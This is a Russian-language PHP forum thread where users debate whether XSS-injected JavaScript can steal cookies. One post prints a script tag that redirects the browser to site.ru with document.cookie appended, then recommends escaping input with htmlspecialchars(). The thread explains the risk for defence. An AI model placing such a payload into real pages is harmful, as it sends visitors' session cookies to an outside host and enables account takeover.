Форум PHP

Про XSS атаки слышали что нибудь? :)

PS
Кстати на этом форуме в смайликах XSS есть...

Да, могут.

те если я соглашусь на предложение FF сохранить пароли от доступа на сайт mysite.ru и недайбог попаду на сайт с таким js кодом то все мои пароли окажутся у злобного хакера ? :)
В не зависимости FF или IE ?

JS сценарий (будем говорить о "вредном случае") запущенный от имени домена вашего, спокойно извлекет куки (а с ними он работать может), и, если надо, выпотрошит из них необходимое, и спокойно отошлет по назначению. А вот там где их "ждут", там уже РНР, но это уже другая история.

я в шоке

>не понимаю :) чем таким javascript может угрожать людям ? :)

таким ни чем угрожать не сможет, а вот если дописать этот скрипт правильно, как я понимаю, то можно натворить бед...
ведь всё это было написано для примера...
попроси знающих людей, пусть тебе покажут полностью скрипт, при помощи которого можно что то сделать плохое...
если такие найдутся и согласятся :)
p.s. было бы самому интересно посмотреть на такой скрипт, в javascript не разбираюсь, потому сам не сделаю....

p.s. вот, уже показали :):):):)

Вот такой код -

<script> location.href='http://www.site.ru/index.php?cookie='+escape(document.cookie); </script>

- будет извлекать cookies и отправлять на сайт www.site.ru.

Этот код может прийти во входящих данных, поэтому надо обрабатывать их с помощью функции htmlspecialchars().

Просто для этого нужно как я понимаю присвоить кукисы клиента какойто переменной, потом ее сохранить в базе или отправить куда то по почте чтобы потом воспользоваться, а это уже php и если javascript кто то и вставит мне в гостевую книгу, то php он туда точно не вставит….я надеюсь :)

или я что то упустил ?

А почему не вериться? И то и другое у клиента.

что то слобо верится чтобы с помошью javasscript можно украсть cookies....